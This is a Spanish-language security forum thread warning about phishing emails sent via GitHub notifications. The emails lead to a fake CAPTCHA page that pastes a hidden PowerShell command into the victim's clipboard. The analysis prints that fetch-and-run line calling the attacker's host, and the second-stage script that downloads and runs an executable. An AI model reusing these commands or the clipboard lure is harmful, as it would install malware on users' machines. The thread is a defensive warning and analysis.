elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Advertencia, estan distribuyendo malware desde este correo: notifications@github.com
0 Usuarios y 3 Visitantes están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Advertencia, estan distribuyendo malware desde este correo: notifications@github.com  (Leído 1,845 veces)
**Aincrad**


Desconectado Desconectado

Mensajes: 680



Ver Perfil WWW
Advertencia, estan distribuyendo malware desde este correo: notifications@github.com
« en: 18 Septiembre 2024, 22:56 pm »

les llegara un correo como este :





Entraremos en la url del correo para analizar rápidamente como funciona: https://github-scanner.com

Lo primero que vemos al entrar es que te pide que verifiques eres humano ;






Oh Sorpresa, esta verificación si esta rara  ;D   :xD  :xD  :xD




El sitio pega en tu portapapeles la siguiente lineal de código :

Código
  1. powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner.com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"


Como estamos viendo en el codigo de arriba, esto se denominaria downloader., un cargador para otra pieza de codigo, veamos el codigo que descarga.



Código
  1. $webClient = New-Object System.Net.WebClient
  2. $url1 = "https://github-scanner.com/l6E.exe"
  3. $filePath1 = "$env:TEMP\SysSetup.exe"
  4. $webClient.DownloadFile($url1, $filePath1)
  5. Start-Process -FilePath  $env:TEMP\SysSetup.exe
  6.  


alv esto tambien es otro downloader, bueno hagamosle un virustotal a ese l6E.exe que descargar : Analisis





Hechando un ojo al virustotal, esto tambien parece un downloader/dropper hecho en c#. descargara mas cosas raras . etc...



En línea



Danielㅤ


Desconectado Desconectado

Mensajes: 1.809


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: Advertencia, estan distribuyendo malware desde este correo: notifications@github.com
« Respuesta #1 en: 19 Septiembre 2024, 01:04 am »

Hola, buena investigación compañero **Aincrad**, gracias por el aviso y aporte.


Saludos
En línea

**Aincrad**


Desconectado Desconectado

Mensajes: 680



Ver Perfil WWW
Re: Advertencia, estan distribuyendo malware desde este correo: notifications@github.com
« Respuesta #2 en: 19 Septiembre 2024, 02:27 am »

me llego otro correo con la misma temática :



esten muy pendientes con esta clase de correos.
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines